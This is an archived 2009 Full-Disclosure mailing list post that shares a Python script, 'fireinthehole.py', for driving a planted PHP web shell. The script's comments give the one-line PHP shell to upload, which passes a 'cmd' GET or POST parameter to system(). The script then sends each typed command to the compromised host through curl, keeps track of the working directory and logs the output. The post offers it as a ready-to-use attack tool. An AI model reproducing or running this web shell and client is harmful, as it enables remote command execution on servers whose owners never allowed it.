| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 05 Nov 2009 00:41:14 +1100
From: malformation@...hmail.me
To: full-disclosure@...ts.grok.org.uk
Subject: Interactive HTTP GET and POST Shell -- R.I.P
str0ke
Nothing new here, but thought this might be useful to some
people...Tries to maintain current working directory when you use
'cd'.
http://codepad.org/POrCafnA
R.I.P str0ke
#!/usr/bin/python
#
# Malformation's Interactive HTTP GET and POST Shell -
fireinthehole.py
#
# Upload something like this to a php file:
# <?php if (isset($_POST["cmd"])) { system($_POST["cmd"]); } ?>
# <?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>
#
# Kisses go to .aware, OTW, STS, darkc0de, str0ke and some Aussies
# Please don't strip the credits out if you modify or redistribute.
import sys, os, time
print '''
Malformation's Interactive HTTP GET and POST Shell
Version - 1.0.0a
Tries to maintain current working directory when you use 'cd'.
Usage:
\tEnter the host => hacked.com/hacked.php
\tEnter the POST variable => cmd
\thacked.com/hacked.php# ls -la
\ttotal 12880
\tdrwxr-xr-x 2 web web 4096 2009-11-03 11:54 .
\tdrwxr-xr-x 15 root root 4096 2009-10-08 13:37 ..
\t-rw-r--r-- 1 web web 481 2009-11-02 18:58 hacked.php
\thacked.com/hacked.php# .
\tBye.
'''
# # # # # Configuration # # # # # #
# 0 to turn off curl verbosity #
debug = 1 #
# # # # # # # # # # # # # # # # # #
write = 0
curl_array = ["/bin/", "/usr/bin/", "/usr/sbin/"]
curl_dirs = ""
count = 0
finalcommand = ""
dir_array = []
for i in range(0,len(curl_array)):
if (os.path.exists(curl_array[i] + "curl")):
count = count + 1
curl_dirs = curl_dirs + curl_array[i] + " "
if (count == 0):
print "Couldn't find curl. Tried looking in " + curl_dirs
sys.exit(0)
try:
if (os.path.exists("fireinthehole.txt")):
file = open("fireinthehole.txt","a")
else:
file = open("fireinthehole.txt","w")
print "Output will be saved to fireinthehole.txt"
write = 1
except IOError:
print "Directory not writable, output will not be saved."
try:
host = raw_input("Enter the host => ")
method = raw_input("GET/POST => ")
if (method == "GET"):
myvar = raw_input("Enter the GET variable => ")
elif (method == "POST"):
myvar = raw_input("Enter the POST variable => ")
else:
sys.exit(0)
while True:
mycommand = raw_input(host + "# ")
finalcommand = ""
if (mycommand == "."):
print "Bye."
sys.exit(0)
mycommand = mycommand + "; "
if (mycommand[0] + mycommand[1] + mycommand[2] == "cd "):
dir_array.insert(len(dir_array) + 1, mycommand)
if (method == "GET"):
string = "curl -s \"" + host + "?" + myvar + "=" + mycommand +
"\""
else:
string = "curl -s -d \"" + myvar + "=" + mycommand + "\" " +
host
if (debug == 1):
print string + ":\n"
continue
if (len(dir_array) != 0):
for j in range(0,len(dir_array)):
finalcommand = finalcommand + dir_array[j]
finalcommand = finalcommand + mycommand
if (finalcommand != ""):
mycommand = finalcommand
if (method == "GET"):
string = "curl -s \"" + host + "?" + myvar + "=" + mycommand +
"\""
else:
string = "curl -s -d \"" + myvar + "=" + mycommand + "\" " + host
if (debug == 1):
print string + ":\n"
command = os.popen(string,"r")
if (write == 1):
file.write(host + "# " + mycommand + "\n")
while(1):
line = command.readline()
line = line.strip()
if line:
print line
if (write == 1):
file.write(line + "\n")
else:
break
except KeyboardInterrupt:
print "\nBye."
sys.exit(0)
except:
print "Unhandled exception"
sys.exit(0)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists